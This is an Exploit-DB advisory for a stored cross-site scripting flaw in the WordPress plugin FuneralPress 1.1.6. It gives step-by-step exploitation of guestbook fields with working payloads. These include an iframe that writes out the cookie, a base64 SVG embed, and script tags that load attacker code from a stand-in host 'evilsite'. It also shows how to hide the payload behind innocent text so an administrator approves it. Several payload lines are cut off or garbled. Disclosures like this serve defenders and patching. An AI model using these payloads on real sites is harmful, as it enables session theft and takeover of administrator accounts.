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exploitdbRob ArmstrongEDB-ID:24914
HistoryApr 02, 2013 - 12:00 a.m.

WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting

Rob Armstrong

AI Score




# WP FuneralPress - stored xss in guestbook
# "FuneralPress is an online website obituary management and guest book
program for funeral homes and cemeteries"
# tested on: funeralpress version 1.1.6 / wordpress version 3.5.1
# impact:
#   malicious script execution as wordpress administrator
# author: [email protected]

# summary

A low-privilege or guest user can inject code via the
<textareaname="photo-message">, <
textarea name="youtube-message"> and <textarea name="message"> elements
which are part of the wpfh_upload_form form in

Scripts injected via the "photo-message" and "youtube-message" elements
will be executed by the admin user when they browse to the guestbook admin
page at http://site/wp-admin/admin.php?page=wpfh-guestbook

If a malicious post is approved by the admin, the script will be run by
anyone viewing the guestbook.

# details

There appears to be some basic xss protection on form submissions using <
textarea name="message"> and code injected via this element is not served
up on the guestbook admin page.

Despite this, scripts injected via an iframe or embedded svg will be
executed by anyone viewing the guestbook at http://site/obituaries/?id=1&f=
guestbook on the condition that the post is approved by the site
administrator. The chances of an administrator approving a malicious
message are increased if some normal-looking text is inserted above the
malicious code, resulting in a legitimate looking "Message Preview" field
on the admin page.

## message post example:

    1. Attacker browses to:
http://site/obituaries/?id=1&f=guestbook&m=addand submits the form
with the following entered into <
textarea name="message" style="width:98%;height:170px" id="wpfh_message_
textarea">&lt;/textarea&gt; :

        Poor Peter was a fine old chap, such a pity he was eaten to death
by a pack of wild children.

        <IFRAME SRC="javascript:document.write('xss cookie: ' +

        <EMBED SRC="data:image/svg+xml
NtYXNjcmlwdCI+YWxlcnQoInhzcyBhbGVydCIpPC9zY3JpcHQ+PC9zdmc+Cg==" type="image/
svg+xml" AllowScriptAccess="always"></EMBED>

    2. Site administrator browses to http://site/wp-admin/admin.php?page=
wpfh-guestbook, sees an entry with a message preview that reads "Poor Peter
was a fine old chap..." and approves it.

    3. Anyone browsing to http://site/obituaries/?id=1+&f=guestbook will
execute the injected script

The xss flaws in <textarea name="photo-message"> and <textarea
are more serious, as scripts injected here are served up to the admin user
when they attempt to approve the guestbook comments at http://site/wp

As with the regular guestbook messages, if the admin approves a malicious
photo or youtube message the script will be executed by anyone browsing to
the guestbook.

## photo/youtube post example:

    1. Attacker hosts malicious javascript on another site:

        http://evilsite/fp.js :
//rewrite admin page

        http://evilsite/doc.js :
            document.write("document.write XSS");alert("XSS");

    2. Attacker browses to:
http://site/obituaries/?id=1&f=guestbook&m=addand selects either the
"Photo" or "
Youtube" guestbook message option

    3. If Photo was selected, the attacker enters a path to a local image
in <input type="file" name="photo" id="wpfh_message_file">. Otherwise they
enter a Youtube link into <input type="text" name="youtube"
style="width:95%" id="wpfh_message_youtube" value="">

    4. Depending on which type of message was selected, the attacker
submits the form with the following entered into
<textareastyle="width:100%;height:70px" name="photo-message"></
textarea> or <textarea style="width:100%;height:70px" name="youtube
-message">&lt;/textarea&gt; :

        <SCRIPT SRC=http://evilsite/fp.js></SCRIPT>
        <SCRIPT SRC=http://evilsite/doc.js></SCRIPT>

    5. The site administrator browses to http://site/wp-admin/admin.php
?page=wpfh-guestbook and the scripts that have been injected into <table
class="wp-list-table widefat fixed posts" cellspacing="0"> are executed:

        <td  style="background-color:#ffd1d1 !important" >
            <a href=""
target="_blank">View Video</a><br><SCRIPT SRC=http://evilsite/fp.js
            <SCRIPT SRC=http://evilsite/doc.js></SCRIPT>

AI Score


